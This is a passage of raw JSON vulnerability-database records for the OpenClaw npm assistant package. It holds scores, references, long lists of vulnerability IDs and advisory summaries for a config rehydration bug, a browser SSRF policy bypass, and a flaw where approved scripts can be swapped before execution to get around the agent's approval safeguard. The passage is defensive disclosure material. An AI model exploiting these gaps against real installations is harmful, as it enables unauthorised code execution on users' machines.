h4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability
":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability
":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-2j53-2c28-g9v2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z3rc-xpx7-fkcu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90164?format=json","vulnerability_id":"VCID-z7wa-tw2t-vqas","summary":"OpenClaw: Tlon Startup Migration Rehydrates Empty-Array Revocations From File Config\n## Summary\nTlon Startup Migration Rehydrates Empty-Array Revocations From File Config\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: v2026.3.28 startup migration still treats empty-array settings as missing and can rehydrate revoked Tlon config from file state after restart.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a4d72a83f01fedd35964c352e3473c7712a3511b` — 2026-03-31T14:57:03+01:00\n\n## Release Process Note\n- The fix is already present in 
released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41388","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12844","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12883","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12878","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41388"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a4d72a83f01fedd35964c352e3473c7712a3511b","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a4d72a83f01fedd35964c352e3473c7712a3511b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":
"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3pm9-5j7m-59vc","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3pm9-5j7m-59vc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41388","reference_id":"CVE-2026-41388","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41388"},{"reference_url":"https://github.com/advisories/GHSA-3pm9-5j7m-59vc","reference_id":"GHSA-3pm9-5j7m-59vc","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3pm9-5j7m-59vc"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-configuration-rehydration-via-empty-array-revocation-handling","reference_id":"openclaw-configuration-rehydration-via-empty-array-revocation-handling","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:
N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-configuration-rehydration-via-empty-array-revocation-handling"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulne
rability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulne
rability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41388","GHSA-3pm9-5j7m-59vc"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z7wa-tw2t-vqas"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90293?format=json","vulnerability_id":"VCID-z8mj-pnbe-wqej","summary":"OpenClaw has Browser SSRF Policy Bypass via Interaction-Triggered Navigation\n## Impact\n\nBrowser SSRF Policy Bypass via Interaction-Triggered Navigation.\n\nBrowser interactions could trigger navigations that bypassed the normal SSRF navigation checks.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.5`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @ccreater222 and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41912","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10088","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10102","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10118","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41912"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vr5g-mmx7-h897","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vr5g-mmx7-h897"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41912","reference_id":"CVE-2026-41912","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41912"},{"reference_url":"https://github.com/advisories/GHSA-vr5g-mmx7-h897","reference_id":"GHSA-vr5g-mmx7-h897","ref
erence_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vr5g-mmx7-h897"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VC
ID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41912","GHSA-vr5g-mmx7-h897"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z8mj-pnbe-wqej"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91563?format=json","vulnerability_id":"VCID-z8sm-pm9t-wyhu","summary":"Duplicate Advisory: OpenClaw: Unbound interpreter and runtime commands could bypass node-host approval integrity\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-xf99-j42q-5w5p. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains an approval integrity vulnerability allowing attackers to execute rewritten local code by modifying scripts between approval and execution when exact file binding cannot occur. 
Remote attackers can change approved local scripts before execution to achieve unintended code execution as the OpenClaw runtime user.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xf99-j42q-5w5p","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xf99-j42q-5w5p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32979","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32979"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unbound-interpreter-and-runtime-commands-bypass-in-node-host-approval","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":"
"}],"url":"https://www.vulncheck.com/advisories/openclaw-unbound-interpreter-and-runtime-commands-bypass-in-node-host-approval"},{"reference_url":"https://github.com/advisories/GHSA-wmgj-hrx3-23gj","reference_id":"GHSA-wmgj-hrx3-23gj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wmgj-hrx3-23gj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3x
